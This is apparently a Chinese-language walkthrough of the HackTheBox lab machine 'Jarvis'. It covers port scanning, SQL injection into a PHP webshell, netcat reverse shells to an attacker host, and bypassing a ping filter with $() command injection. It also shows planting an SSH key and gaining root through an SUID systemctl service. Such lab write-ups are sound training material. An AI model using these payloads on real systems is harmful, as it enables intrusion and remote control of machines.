Jarvis - HackTheBox

基本信息

• https://www.hackthebox.eu/home/machines/profile/194

• 10.10.10.143

端口扫描

需要全端口，有一个64999(不过也没怎么用到这个端口)：

$ nmap -p- --min-rate=1000 10.10.10.143
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-07 13:19 CST
Nmap scan report for 10.10.10.143
Host is up (0.071s latency).
Not shown: 65531 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
45505/tcp filtered unknown
64999/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 1008.70 seconds

$ nmap -sC -sV -p 22,80,64999 10.10.10.143
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-07 13:19 CST
Nmap scan report for 10.10.10.143
Host is up (0.082s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
|   256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_  256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
64999/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.72 seconds

80

一个hotel：

64999

直接访问显示banned 90秒：

SQL注入

80的web很基础的sql注入：

sqli to webshell

load_file,into outfile 读写文件，直接写wbeshell：

http://10.10.10.143/room.php?cod=-1 union select 1,'<?php system($_GET["cmd"]);?>',3,4,5,6,7 into outfile '/var/www/html/miao.php'

reverse shell

服务器有nc，直接reverse shell：

10.10.10.143/miao.php?cmd=nc -e /bin/bash 10.10.14.7 4445

python -c 'import pty;pty.spawn("/bin/bash")'

信息搜集

当前是www-data用户，sudo -l显示可以无密码以pepper身份执行/var/www/Admin-Utilities/simpler.py：

命令注入

查看这个文件，里面有一个exec_ping函数调用了system，command是我们输入的，有简单的过滤：

def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')   
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)

但可以使用$(cmd)这种方式执行命令：

sudo -u pepper /var/www/Admin-Utilities/simpler.py -p

Enter an IP: $(whoami).test.com

simpler.py

#!/usr/bin/env python3
from datetime import datetime
import sys
import os
from os import listdir
import re

def show_help():
    message='''
********************************************************
* Simpler   -   A simple simplifier ;)                 *
* Version 1.0                                          *
********************************************************
Usage:  python3 simpler.py [options]

Options:
    -h/--help   : This help
    -s          : Statistics
    -l          : List the attackers IP
    -p          : ping an attacker IP
    '''
    print(message)

def show_header():
    print('''***********************************************
     _                 _
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/
                                @ironhackers.es

***********************************************
''')

def show_statistics():
    path = '/home/pepper/Web/Logs/'
    print('Statistics\n-----------')
    listed_files = listdir(path)
    count = len(listed_files)
    print('Number of Attackers: ' + str(count))
    level_1 = 0
    dat = datetime(1, 1, 1)
    ip_list = []
    reks = []
    ip = ''
    req = ''
    rek = ''
    for i in listed_files:
        f = open(path + i, 'r')
        lines = f.readlines()
        level2, rek = get_max_level(lines)
        fecha, requ = date_to_num(lines)
        ip = i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3]
        if fecha > dat:
            dat = fecha
            req = requ
            ip2 = i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3]
        if int(level2) > int(level_1):
            level_1 = level2
            ip_list = [ip]
            reks=[rek]
        elif int(level2) == int(level_1):
            ip_list.append(ip)
            reks.append(rek)
        f.close()

    print('Most Risky:')
    if len(ip_list) > 1:
        print('More than 1 ip found')
    cont = 0
    for i in ip_list:
        print('    ' + i + ' - Attack Level : ' + level_1 + ' Request: ' + reks[cont])
        cont = cont + 1

    print('Most Recent: ' + ip2 + ' --> ' + str(dat) + ' ' + req)

def list_ip():
    print('Attackers\n-----------')
    path = '/home/pepper/Web/Logs/'
    listed_files = listdir(path)
    for i in listed_files:
        f = open(path + i,'r')
        lines = f.readlines()
        level,req = get_max_level(lines)
        print(i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3] + ' - Attack Level : ' + level)
        f.close()

def date_to_num(lines):
    dat = datetime(1,1,1)
    ip = ''
    req=''
    for i in lines:
        if 'Level' in i:
            fecha=(i.split(' ')[6] + ' ' + i.split(' ')[7]).split('\n')[0]
            regex = '(\d+)-(.*)-(\d+)(.*)'
            logEx=re.match(regex, fecha).groups()
            mes = to_dict(logEx[1])
            fecha = logEx[0] + '-' + mes + '-' + logEx[2] + ' ' + logEx[3]
            fecha = datetime.strptime(fecha, '%Y-%m-%d %H:%M:%S')
            if fecha > dat:
                dat = fecha
                req = i.split(' ')[8] + ' ' + i.split(' ')[9] + ' ' + i.split(' ')[10]
    return dat, req

def to_dict(name):
    month_dict = {'Jan':'01','Feb':'02','Mar':'03','Apr':'04', 'May':'05', 'Jun':'06','Jul':'07','Aug':'08','Sep':'09','Oct':'10','Nov':'11','Dec':'12'}
    return month_dict[name]

def get_max_level(lines):
    level=0
    for j in lines:
        if 'Level' in j:
            if int(j.split(' ')[4]) > int(level):
                level = j.split(' ')[4]
                req=j.split(' ')[8] + ' ' + j.split(' ')[9] + ' ' + j.split(' ')[10]
    return level, req

def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)

if __name__ == '__main__':
    show_header()
    if len(sys.argv) != 2:
        show_help()
        exit()
    if sys.argv[1] == '-h' or sys.argv[1] == '--help':
        show_help()
        exit()
    elif sys.argv[1] == '-s':
        show_statistics()
        exit()
    elif sys.argv[1] == '-l':
        list_ip()
        exit()
    elif sys.argv[1] == '-p':
        exec_ping()
        exit()
    else:
        show_help()
        exit()

pepper shell

那就直接以pepper身份反弹shell:

sudo -u pepper /var/www/Admin-Utilities/simpler.py -p

$(/tmp/miao.sh)

python -c 'import pty;pty.spawn("/bin/bash")'

ssh key

为了后续方便操作可以直接把ssh公钥写进去：

mkdir .ssh
cd .ssh
echo 'ssh-rsa *****' > authorized_keys

miao.sh

echo -e '#!/bin/bash\n\nnc -e /bin/bash 10.10.14.7 4446' > /tmp/miao.sh

chmod +x /tmp/miao.sh

user flag

petter用户目录得到user.txt:

提权信息

systemctl有suid：

find / -perm -u=s -type f 2>/dev/null

利用方式：

• systemctl | GTFOBins
  https://gtfobins.github.io/gtfobins/systemctl/

就是创建一个service，执行命令

miao.service

[Service]
Type=oneshot
ExecStart=/bin/bash -c 'nc -e /bin/bash 10.10.14.7 4447'

[Install]
WantedBy=multi-user.target

提权 & root flag

systemctl link /tmp/miao.service
systemctl enable --now /tmp/miao.service

打到root shell，读取root.txt:

参考资料

• systemctl | GTFOBins
  https://gtfobins.github.io/gtfobins/systemctl/
• HTB: Jarvis | 0xdf hacks stuff
  https://0xdf.gitlab.io/2019/11/09/htb-jarvis.html
• https://www.hackthebox.eu/home/machines/writeup/194
• HackTheBox - Jarvis - YouTube
  https://www.youtube.com/watch?v=YHHWvXBfwQ8&feature=youtu.be&ab_channel=IppSec